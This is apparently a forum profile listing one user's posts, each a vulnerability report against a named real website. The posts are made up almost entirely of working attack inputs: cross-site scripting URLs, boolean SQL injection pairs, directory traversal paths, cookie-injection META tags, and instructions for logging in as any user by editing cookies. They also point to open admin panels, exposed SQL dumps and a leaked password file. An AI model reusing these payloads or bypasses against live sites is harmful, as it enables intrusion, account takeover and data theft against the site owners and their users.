agentsteal

Members
  • Posts: 230
  • Joined
  • Last visited: Never

Everything posted by agentsteal

  1. Array: http://www.aviationrecruitment.co.uk/jobseekers/job-info.php?job_id[]
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers2.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers6.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers10.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers11.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers13.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers14.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers15.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers16.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/delete.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers1.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers12.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/employers7.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/EmployerSearch.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/index.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/PostJob.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/employers/upload.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/jobseekers/forgot.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/story.php/"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/phpinfo.php?<script>alert('vulnerable')</script>
     Cross Site Scripting: http://www.aviationrecruitment.co.uk/jobseekers/job-info.php?job_id="><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: There is Cross Site Scripting on the view resume page if the fields contain code.
     Cross Site Scripting: There is Cross Site Scripting on the edit resume page if the fields contain ">code.
     Cross Site Scripting: There is Cross Site Scripting on the edit resume page if the fields contain </textarea>code.
     Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
     Cross Site Scripting: There is Cross Site Scripting on the employer edit profile page if the fields contain ">code.
     Cross Site Scripting: There is Cross Site Scripting on the employer edit profile page if the drop down menus contain code.
     Cross Site Scripting: There is Cross Site Scripting on the forgot password page if the fields contain code.
     Cross Site Scripting: There is Cross Site Scripting on the edit profile page if the fields contain ">code.
     Cross Site Scripting: There is Cross Site Scripting on the edit profile page if the drop down menus contain code.
     Cross Site Scripting: There is Cross Site Scripting in the uploaded images.
     Cross Site Scripting: There is Cross Site Scripting on the image upload page if the filename contains 'code.
     Cross Site Scripting: There is Cross Site Scripting on the cv upload page if the filename contains 'code.
     Drop Down Menu: If you edit the drop down menus on the edit resume page you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menus on the employer edit profile page you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menus when you register you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menus on the edit profile page you can submit arbitrary values.
     Drop Down Menu: If you edit the drop down menus on http://www.aviationrecruitment.co.uk/employers/EmployerSearch.php you can submit arbitrary values.
     Full Path Disclosure: http://www.aviationrecruitment.co.uk/phpinfo.php
     Full Path Disclosure: http://www.aviationrecruitment.co.uk/employers/employers4.php
     Full Path Disclosure: http://www.aviationrecruitment.co.uk/employers/EmployerSearch.php
     Full Path Disclosure: There is Full Path Disclosure if the drop down menus on http://www.aviationrecruitment.co.uk/employers/EmployerSearch.php contain invalid values.
     SQL Error: http://www.aviationrecruitment.co.uk/employers/employers10.php
     SQL Error: http://www.aviationrecruitment.co.uk/employers/employers11.php
     User Enumeration: http://www.aviationrecruitment.co.uk/~aviation
     User Enumeration: http://www.aviationrecruitment.co.uk/~root
  2. Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Maximum name length field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Number of shouts to display field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Maximum shout length field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Add a space in words longer than (chars) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Main text color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Main text font family field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Main text font size (pt) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Shoutboxer border color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Shoutboxer border size (px) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Header writing field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Header background color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Header text color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Shout button value field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Main form background color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Form input background color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Form input border color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Form input border size (px) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Form input text color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the First shout row background color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Alternating shout row background color (hex) field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting in the admin panel if the Ban notification text color (hex) field contains ">code.
     Drop Down Menu: If you edit the Order drop down menus you can submit arbitrary values.
     Drop Down Menu: If you edit the Sort by drop down menus you can submit arbitrary values.
     Full Path Disclosure: There is Full Path Disclosure if the Order drop down menu contains an invalid value.
     Full Path Disclosure: There is Full Path Disclosure if the Sort by drop down menu contains an invalid value.
     Maximum Length: If you edit the input boxes in the admin panel you can submit values that are longer than the maximum lengths.
     User Enumeration: http://www.diondesign.net/~kjdion
  3. Admin Access: Anyone can access the admin panels.
     Cross Site Scripting: http://www.phpneoform.com/117/a/<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.phpneoform.com/117/index.php?<marquee><h1>vulnerable</marquee>
     Full Path Disclosure: http://www.phpneoform.com/phpneoform.v.1.201/install.php
     Full Path Disclosure: http://www.phpneoform.com/1201/install.php
     Includes Directory: http://www.phpneoform.com/
     Includes Directory: http://www.phpneoform.com/117/public/
     SQL Dump: http://www.phpneoform.com/1201/install.sql
     SQL Dump: http://www.phpneoform.com/phpneoform.v.1.201/install.sql
  4. Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage1.php if the playedbefore field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage2.php if the aaa field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage2.php if the aaaprediction field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the aaa field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the bbb field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the aaaprediction field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the bbbprediction field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/stage3.php if the stage2table field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the aaa field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the bbb field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the ccc field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the aaaprediction field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the bbbprediction field contains code.
     Cross Site Scripting: There is Cross Site Scripting on http://www.numberpsychic.net/results.php if the cccprediction field contains code.
     Cross Site Scripting: There is Cross Site Scripting if the drop down menus contain ">code.
     Drop Down Menu: If you edit the drop down menus you can submit arbitrary values.
  5. Array: http://www.xsvcash.com/test/register.php?r[]
     Cross Site Scripting: http://www.xsvcash.com/cgi-bin/gpte.cgi?page=User_Signup_Form&E_Mail=<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.xsvcash.com/cgi-bin/gpte.cgi?page=User_Signup_Form&Referrer=<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.xsvcash.com/cgi-bin/gpte.cgi.old?page=User_Signup_Form&E_Mail=<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: http://www.xsvcash.com/cgi-bin/gpte.cgi.old?page=User_Signup_Form&Referrer=<marquee><h1>vulnerable</marquee>
     Cross Site Scripting: There is Cross Site Scripting on the Account Info page if your useragent contains code.
     Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code.
     Directory Traversal: http://www.xsvcash.com/cgi-bin/gptecntct.cgi?url=../cgi-bin/
     Directory Traversal: http://www.xsvcash.com/cgi-bin/gptelogin.cgi?id=aaaaaa&pass=aaaaaa&op=0&ut=0&url=../
     Directory Traversal: http://www.xsvcash.com/cgi-bin/gptemsg.cgi?url=../cgi-bin/
     Full Path Disclosure: http://www.xsvcash.com/test/contact.php
     Full Path Disclosure: http://www.xsvcash.com/test/
     Full Path Disclosure: http://www.xsvcash.com/test/advertise.php
     Full Path Disclosure: http://www.xsvcash.com/test/config.php
     Full Path Disclosure: http://www.xsvcash.com/test/login.php
     Full Path Disclosure: http://www.xsvcash.com/test/register.php
     Full Path Disclosure: http://www.xsvcash.com/test/surf.php
     Includes Directory: http://www.xsvcash.com/pages/
     Insecure Cookie: You shouldn't put the password in the cookie.
     Insecure Cookie: You shouldn't put the username in the cookie.
     SQL Injection: http://www.xsvcash.com/cgi-bin/gptemsgbox.cgi?ut=0&msg=1 AND 1=1 http://www.xsvcash.com/cgi-bin/gptemsgbox.cgi?ut=0&msg=1 AND 1=2
     SQL Injection: http://www.xsvcash.com/cgi-bin/gpte.cgi?page=EMail_Verification_Code_Sent'+and+'1'='1 http://www.xsvcash.com/cgi-bin/gpte.cgi?page=EMail_Verification_Code_Sent'+and+'1'='2
     SQL Injection: http://www.xsvcash.com/cgi-bin/gpte.cgi.old?page=EMail_Verification_Code_Sent'+and+'1'='1 http://www.xsvcash.com/cgi-bin/gpte.cgi.old?page=EMail_Verification_Code_Sent'+and+'1'='2
     URL Inclusion: http://www.xsvcash.com/cgi-bin/gptecntct.cgi?url=http://www.google.com/
     URL Inclusion: http://www.xsvcash.com/cgi-bin/gptemsg.cgi?url=http://www.google.com/
     URL Inclusion: http://www.xsvcash.com/cgi-bin/gptelogin.cgi?id=aaaaaa&pass=aaaaaa&op=0&ut=0&url=http://www.google.com/
     User Enumeration: http://www.xsvcash.com/~root
     User Enumeration: http://xsvcash.com/~xsvcashc
     You can log in as any user by setting the URL to their username and password.
     You shouldn't put the password in the URL.
     You shouldn't put the username in the URL.
  6. Array: http://www.oxyfactor.com/billing/index.php?action[]
     Array: http://www.oxyfactor.com/billing/index.php?fuse[]
     Array: http://www.oxyfactor.com/billing/index.php?view[]
     Cross Site Scripting: There is Cross Site Scripting on the Account Information page if the Coupon Code field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on the Account Information page if the Password field contains ">code.
     Cross Site Scripting: There is Cross Site Scripting on the Terms and Conditions when you register if the fields contain ">code.
     Directory Traversal: http://www.oxyfactor.com/index.php?page=about/../hosting
     DOS: http://www.oxyfactor.com/modules/forums/index.inc.php/
     Drop Down Menu: If you edit the drop down menus on the registration page you can submit arbitrary values.
     Full Path Disclosure: http://www.oxyfactor.com/billing/index.php?action=a
     Full Path Disclosure: http://www.oxyfactor.com/billing/index.php?fuse=admin&action=RequestPassword&ajaxRequest=1&emailToSend[]
     Full Path Disclosure: http://www.oxyfactor.com/billing/classes/MailGateway.php
     Full Path Disclosure: http://www.oxyfactor.com/billing/modules/admin/actions/RequestPassword.php
     Full Path Disclosure: http://www.oxyfactor.com/billing/index.php?view=a
     Includes Directory: http://www.oxyfactor.com/billing/templates/Raleigh/signup/
     User Enumeration: http://www.oxyfactor.com/~nobody
     User Enumeration: http://www.oxyfactor.com/~oxyfacto
     User Enumeration: http://www.oxyfactor.com/~root
  7. Cross Site Scripting: http://char.rev-ro.com/img.php?"><marquee><h1>vulnerable</marquee>
     Cross Site Scripting: There is Cross Site Scripting in the avatars.
     Cross Site Scripting: There is Cross Site Scripting if the Player Bio field contains </textarea>code.
     Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
     Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.
  8. Full Path Disclosure: http://toxic.local-host.co.il/index.php?a[]
  9. Admin Access: http://www2.winmastergames.com/freemusic/login.js contains your password.
     Cross Site Scripting: There is Cross Site Scripting in the avatars.
     Cross Site Scripting: There is Cross Site Scripting on http://www2.winmastergames.com/bloodscars/website-data/blog/post.php if the fields contain ">code.
     Drop Down Menu: If you edit the drop down menu on http://www2.winmastergames.com/yonder/ you can submit arbitrary values.
     Full Path Disclosure: http://www2.winmastergames.com/yonder/?url=youtube.com
     You can view the pages in http://www2.winmastergames.com/freemusic/ without logging in if you don't let the pages redirect you.
     You can view the pages in http://www2.winmastergames.com/freemusic/ without logging in if you set the login cookie to 1.
     You can view the pages in http://www2.winmastergames.com/test/ without logging in if you don't let the pages redirect you.
     You can view the pages in http://www2.winmastergames.com/test/ without logging in if you set the login cookie to 1.
  10. Array: http://www.phpsnips.com/help.php?help[]
      Array: http://www.phpsnips.com/help.php?id[]
      Array: http://www.phpsnips.com/search.php?letter[]
      Array: http://www.phpsnips.com/search.php?search_by=1&q[]
      Array: http://www.phpsnips.com/snippet.php?id[]
      Array: http://www.phpsnips.com/snippet_comment.php?id[]
      Array: http://www.phpsnips.com/tempSnip.php?id[]
      Array: http://www.phpsnips.com/temp_snippet_comment.php?id[]
      Array: http://www.phpsnips.com/vote.php?id[]
      Cross Site Scripting: http://www.phpsnips.com/editTempSnip.php?id="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.phpsnips.com/help.php?help=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.phpsnips.com/help.php?id="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.phpsnips.com/join.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.phpsnips.com/search.php?letter=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.phpsnips.com/search.php?search_by=1&q=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.phpsnips.com/snippet.php?id="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.phpsnips.com/snippet_comment.php?id="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.phpsnips.com/tempSnip.php?id="><marquee><h1>vulnerablevulnerable</marquee>
      Cross Site Scripting: http://www.phpsnips.com/temp_snippet_comment.php?id="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting when you submit a snippet if the title field contains ">code and the code field is null.
      Cross Site Scripting: There is Cross Site Scripting when you post a snippet if the title contains code.
      Cross Site Scripting: There is Cross Site Scripting on the edit snippet page if the title field contains ">code.
      Cross Site Scripting: There is Cross Site Scripting on the edit snippet page if the code field contains </textarea>code.
      Full Path Disclosure: http://www.phpsnips.com/editTempSnip.php?id[]
      META Tag Injection: http://www.phpsnips.com/help.php?help=<meta+http-equiv='Set-cookie'+content='PHPSESSID=vulnerable'>
      META Tag Injection: http://www.phpsnips.com/search.php?search_by=1&q=<meta+http-equiv='Set-cookie'+content='PHPSESSID=vulnerable'>
      SQL Dump: http://www.phpsnips.com/examples/Text1.php
      SQL Error: http://www.phpsnips.com/help.php?id='
      SQL Error: http://www.phpsnips.com/search.php?letter='
      SQL Error: http://www.phpsnips.com/snippet.php?id='
      SQL Error: http://www.phpsnips.com/snippet_comment.php?id='
      SQL Error: http://www.phpsnips.com/tempSnip.php?id='
      SQL Error: http://www.phpsnips.com/temp_snippet_comment.php?id='
      SQL Injection: http://www.phpsnips.com/snippet_comment.php?id=1' AND 1='1 http://www.phpsnips.com/snippet_comment.php?id=1' AND 1='2
  11. Cross Site Scripting: There is Cross Site Scripting if a comment contains code.
      Full Path Disclosure: http://www.helraizer.co.uk/count/test.php
      Full Path Disclosure: http://www.helraizer.co.uk/count/test1.php
  12. Includes Directory: http://www.carnagestk.info/admin/
      Includes Directory: http://www.carnagestk.info/include/
      Includes Directory: http://www.carnagestk.info/sql/
  13. Array: http://anuj-blog.co.nr/?page[]
      Cross Site Scripting: http://anuj-blog.co.nr/?page=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code.
      Directory Traversal: http://anuj-blog.co.nr/?page=../themes/doop
      DOS: http://anuj-blog.co.nr/?page=../themes/doop
      Full Path Disclosure: http://anuj-blog.co.nr/?page
      Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.
      Includes Directory: http://anuj-blog.co.nr/pages/
      User Enumeration: http://anuj-blog.co.nr/~nobody
      User Enumeration: http://anuj-blog.co.nr/~root
  14. Cross Site Scripting: http://www.sheepeep.com/index.php?p=1'><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.sheepeep.com/index.php?p=4<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.sheepeep.com/index.php?page=news&date=<marquee><h1>vulnerable</marquee>
      Full Path Disclosure: http://www.sheepeep.com/admin.php
      Full Path Disclosure: http://www.sheepeep.com/avatarparse.php
      Full Path Disclosure: http://www.sheepeep.com/avatarparse.php?id=2
      Full Path Disclosure: http://www.sheepeep.com/comments.php
      Full Path Disclosure: http://www.sheepeep.com/index.php?p=4
      Full Path Disclosure: http://www.sheepeep.com/index.php?p[]
      Full Path Disclosure: http://www.sheepeep.com/index.php?page[]
      Full Path Disclosure: http://www.sheepeep.com/login.php
      Full Path Disclosure: http://www.sheepeep.com/mod.php
      Full Path Disclosure: http://www.sheepeep.com/index.php?page=news&date=a
      Full Path Disclosure: http://www.sheepeep.com/pages.php
      Full Path Disclosure: http://www.sheepeep.com/profile.php
      Full Path Disclosure: http://www.sheepeep.com/register.php
      Full Path Disclosure: http://www.sheepeep.com/usercp.php
      SQL Error: http://www.sheepeep.com/index.php?p=a
      SQL Error: http://www.sheepeep.com/index.php?page=members&p=99999999999999
      SQL Error: http://www.sheepeep.com/index.php?page=profile&id=1
      SQL Error: There is an SQL Error if your username contains \\
      SQL Error: There is an SQL Error on http://www.sheepeep.com/admin/ if your password contains \\
      SQL Error: There is an SQL Error on http://www.sheepeep.com/mod/ if your password contains \\
      SQL Error: There is an SQL Error when you register.
  15. Admin Access: Anyone can access the admin panel.
      Admin Access: If you add .php in the admin panel as a valid file upload extension you can upload PHP scripts.
      Cross Site Scripting: http://www.helraizer.co.uk/test/index.cgi?mode=album&album=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.helraizer.co.uk/test/index.cgi?mode=image&album=/Sample%20Album&image=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.helraizer.co.uk/test/index.cgi?mode=search&searchstring="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if your username contains ">code.
      Drop Down Menu: If you edit the drop down menu on http://www.helraizer.co.uk/test/index.cgi?mode=album&album=%2FSample+Album you can submit arbitrary values.
      Drop Down Menu: If you edit the drop down menu on http://www.helraizer.co.uk/test/index.cgi?mode=image&album=%2FSample+Album&image=Orange+Flower.jpg you can submit arbitrary values.
      Maximum Length: If you edit the message field you can remove the maximum length.
      Maximum Length: If you edit the username field you can remove the maximum length.
  16. Array: http://www.aplaceforpets1.com/category.php?cat[]
      Array: http://www.aplaceforpets1.com/search.php?q[]
      Array: http://www.aplaceforpets1.com/thumbnail.php?img[]
      Cross Site Scripting: http://www.aplaceforpets1.com/category.php?cat=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://www.aplaceforpets1.com/search.php?q=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code.
      Directory Traversal: http://www.aplaceforpets1.com/thumbnail.php?img=../public_html/puppy/leah.jpg
      Drop Down Menu: If you edit the drop down menu on the category page you can submit arbitrary values.
      Full Path Disclosure: http://www.aplaceforpets1.com/category.php?offseta[]
      Full Path Disclosure: http://www.aplaceforpets1.com/page.php
      Full Path Disclosure: http://www.aplaceforpets1.com/product.php
      Full Path Disclosure: http://www.aplaceforpets1.com/products.php?browse[]
      Full Path Disclosure: http://www.aplaceforpets1.com/thumbnail.php
      SQL Error: http://www.aplaceforpets1.com/category.php?cat='
      SQL Injection: http://www.aplaceforpets1.com/category.php?cat=1 OR 1=1 http://www.aplaceforpets1.com/category.php?cat=1 OR 1=2
      SQL Injection: http://www.aplaceforpets1.com/page.php?id=11 AND 1=1 http://www.aplaceforpets1.com/page.php?id=11 AND 1=2
      SQL Injection: http://www.aplaceforpets1.com/product.php?id=14 AND 1=1 http://www.aplaceforpets1.com/product.php?id=14 AND 1=2
      User Enumeration: http://www.aplaceforpets1.com/~aplacef3
      User Enumeration: http://www.aplaceforpets1.com/~root
  17. Cross Site Scripting: http://www.debateatopic.com/verification/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting on the Contact Us page if the drop down menu contains ">code.
      Cross Site Scripting: There is Cross Site Scripting on the Contact Us page if the fields contain ">code.
      Drop Down Menu: If you edit the drop down menu on the Contact Us page you can submit arbitrary values.
      Full Path Disclosure: http://www.debateatopic.com/?module=categories&cat[]
      Full Path Disclosure: http://www.debateatopic.com/?module=verification&vid[]
      Full Path Disclosure: http://www.debateatopic.com/download
      Full Path Disclosure: There is Full Path Disclosure if the login cookie is an array.
      Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is an array.
      Full Path Disclosure: There is Full Path Disclosure if the PHPSESSID cookie is set to an invalid value.
      Includes Directory: http://www.debateatopic.com/includes/pages/
  18. Cross Site Scripting: http://www.clickonlinehomes.com/?c=<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting on the search page if the drop down menus contain code.
      Cross Site Scripting: There is Cross Site Scripting on the save a search page if the drop down menus contain code.
      Cross Site Scripting: There is Cross Site Scripting on the My Account page if the fields contain code.
      Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain ">code.
      Cross Site Scripting: There is Cross Site Scripting when you save a search if the fields contain code.
      Drop Down Menu: If you edit the drop down menus on the search page you can submit arbitrary values.
      Insecure Cookie: You shouldn't put the email address in the cookie.
      SQL Dump: http://www.clickonlinehomes.com/test.txt
      SQL Error: There is an SQL Error on the search page if the drop down menus contain invalid values.
      You can log in as any user by setting the email cookie to their email address.
  19. Cross Site Scripting: There is Cross Site Scripting if the URL field contains code.
      Full Path Disclosure: http://www.flash-portal.org/fp-proxy/completeRequest.php
      Full Path Disclosure: http://www.flash-portal.org/fpslay/codedfp/po/completeRequest.php
      User Enumeration: http://www.flash-portal.org/~root
  20. Array: http://www.officialmc.com/email/?_action=compose&_to[]
      Array: http://www.officialmc.com/email/?_mbox[]
      Includes Directory: http://www.officialmc.com/email/bin/
  21. Cross Site Scripting: http://ns2271.serverpowered.net/wv/<marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting when you upload an image if the image notes field contains </textarea>code.
      Cross Site Scripting: There is Cross Site Scripting if your username contains ">code.
      Cross Site Scripting: There is Cross Site Scripting on http://ns2271.serverpowered.net/wv/ if your username contains ">code.
      Cross Site Scripting: There is Cross Site Scripting on http://ns2271.serverpowered.net/wv/cti/ if your username contains ">code.
      Cross Site Scripting: There is Cross Site Scripting on http://ns2271.serverpowered.net/wv/gha/ if your username contains ">code.
      Drop Down Menu: If you edit the drop down menus on the options page you can submit arbitrary values.
      Full Path Disclosure: http://ns2271.serverpowered.net/wv/
      Full Path Disclosure: There is Full Path Disclosure if the fields contain invalid values.
      Full Path Disclosure: There is Full Path Disclosure if you upload an image.
      SQL Error: http://ns2271.serverpowered.net/wv/contact/
      User Enumeration: http://ibsdev.serverpowered.net/~root
      User Enumeration: http://ibsdev.serverpowered.net/~webview
  22. Cross Site Scripting: http://www.theinsomniaxe.com/hoast/index.php/"><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: There is Cross Site Scripting if the filename contains code.
      Cross Site Scripting: There is Cross Site Scripting in the image upload.
      Full Path Disclosure:
  23. Array: http://php-scripts.inpraag.nl/tools/createClass.php?className[]
      Array: http://php-scripts.inpraag.nl/tools/createClass.php?functions[]
      Array: http://php-scripts.inpraag.nl/tools/createClass.php?variables[]
      Cross Site Scripting: http://php-scripts.inpraag.nl/tools/createClass.php?className="><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://php-scripts.inpraag.nl/tools/createClass.php?className=</textarea><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://php-scripts.inpraag.nl/tools/createClass.php?functions=</textarea><marquee><h1>vulnerable</marquee>
      Cross Site Scripting: http://php-scripts.inpraag.nl/tools/createClass.php?variables=</textarea><marquee><h1>vulnerable</marquee>
  24. CAPTCHA: The CAPTCHA never changes.
      Cross Site Scripting: There is Cross Site Scripting on http://nab.geekrack.net/ip.php if the ip address field contains code.
      Full Path Disclosure: http://www.youcade.net/nab/index.php?act=newtopic
      Full Path Disclosure: http://www.youcade.net/nab/index.php?act=topicshow&id=a
      Full Path Disclosure: http://www.youcade.net/nab/index.php?act=viewforum
      SQL Error: http://nab.geekrack.net/index.php?act=viewforum&id=1&p=a
      User Enumeration: http://www.youcade.net/~root
      User Enumeration: http://www.youcade.net/~youcade
  25. Cross Site Scripting: There is Cross Site Scripting on http://www.hosting-needs.com/testscripts/ftptest1.php if the fields contain code.
      Full Path Disclosure: There is Full Path Disclosure on http://www.hosting-needs.com/testscripts/ftptest1.php if you submit an FTP server.
      Full Path Disclosure: There is Full Path Disclosure if you submit a host.
      User Enumeration: http://www.hosting-needs.com/~mainsite